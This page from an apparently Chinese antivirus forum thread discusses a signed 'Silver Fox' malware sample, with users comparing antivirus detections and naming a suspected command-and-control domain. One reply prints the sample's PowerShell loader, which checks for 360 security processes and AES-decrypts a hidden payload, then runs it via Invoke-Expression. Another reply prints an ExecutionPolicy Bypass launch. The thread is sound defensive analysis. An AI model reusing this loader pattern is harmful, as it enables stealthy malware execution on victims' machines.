123
返回列表 发新帖
楼主: ジ蓅暒划过づ
收起左侧

[病毒样本] 有数字签名的银狐1X

[复制链接]
jxfaiu
发表于 2025-11-11 14:43:56 | 显示全部楼层
卡巴现在双击有反应了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
时光难逆
发表于 2025-11-11 15:46:02 | 显示全部楼层
本帖最后由 时光难逆 于 2025-11-11 15:47 编辑

经分析,目标调用的系统自带程序在执行恶意命令,应该是不标记原因。
  1. "c:\\escsvc\\toolsps.exe" if (Get-Process -Name '360Tray','360sd' -ErrorAction SilentlyContinue) { $AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\4.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent } else { Start-Process 'c:\\escsvc\\5.exe';$AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\3.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent }
复制代码
  1. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Root\AppData\Local\Temp\guardian_142e0635.ps1"
复制代码


wowocock
发表于 2025-11-11 16:10:12 | 显示全部楼层
中毒后用火绒木马专杀查杀即可。
Rukia
发表于 2025-11-11 16:30:48 | 显示全部楼层
AMD_Ryzen 发表于 2025-11-11 08:05
BEST 双击miss

观察到疑似C2 地址:y-3.jplong.org

回复有没有说拉黑escsvc.exe
AMD_Ryzen
发表于 2025-11-11 17:55:09 | 显示全部楼层
Rukia 发表于 2025-11-11 16:30
回复有没有说拉黑escsvc.exe

并没有,BD的上报回复是不包含检测信息的,我测试下来也没检测escsvc.exe

你这么一说,我又去重测了一下,结果居然发现更新后BEST的行为又发生变化了,变化过程是这样的:
1.一开始是只添加了云拉黑
2.第二次测试的时候,云拉黑+ATC可以检测安装程序+给toolsps.exe执行的命令(22楼提到的这个)加了3个特征
3.最新更新以后,ATC不检测了,toolsps.exe的命令也不报了,变成云拉黑+拉黑toolsps.exe连接的网址

难道BD推出更新时还搞A/B测试嘛,有点意思,明天再看看BD报法还有没有新变化
AMD_Ryzen
发表于 2025-11-11 18:41:38 | 显示全部楼层
Rukia 发表于 2025-11-11 16:30
回复有没有说拉黑escsvc.exe

刚说完版本号又更新了一个小数点,这次又不一样了:
云拉黑,ATC不触发,但是toolsps.exe的命令又被检测上了,可是toolsps.exe连接的网址又不检测了,这来回排列组合呢
Rukia
发表于 2025-11-11 19:23:55 | 显示全部楼层
AMD_Ryzen 发表于 2025-11-11 18:41
刚说完版本号又更新了一个小数点,这次又不一样了:
云拉黑,ATC不触发,但是toolsps.exe的命令又被检测 ...

https://www.virustotal.com/gui/u ... 1cfe05d3e/detection

https://www.virustotal.com/gui/u ... 122ad9d63?nocache=1

楼上分析结果的是有两个外联域名,BD对其中一个添加了检测。
命令的检测类似这个?
实时防护检测到威胁CMD:Heur.BZC.ZFV.Nioc.1.86B469D6。 未采取任何操作。此项目将由toolsps.exe(c:\escsvc\toolsps.exe)进一步处理。 这是AMSI反恶意软件扫描接口检测。
AMD_Ryzen
发表于 2025-11-11 19:35:01 | 显示全部楼层
本帖最后由 AMD_Ryzen 于 2025-11-11 19:47 编辑

是的,不过我这边运行的时候观察流量,只能看到jplong这个域名,另外一个域名一直没出现过,可能和系统时区地域有关?不过我刚才更新过后,jplong这个VT上检出的域名BEST也不报了,非常奇怪

复测确认了,7.99778这个小版本连之前版本已经拉黑的jplong也不拦截了,感觉应该是BD的更新策略







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
引领五基生活
发表于 2025-11-11 22:07:16 | 显示全部楼层
fsp kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
biue
发表于 2025-11-12 01:36:59 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-1-15 02:37 , Processed in 2.621674 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表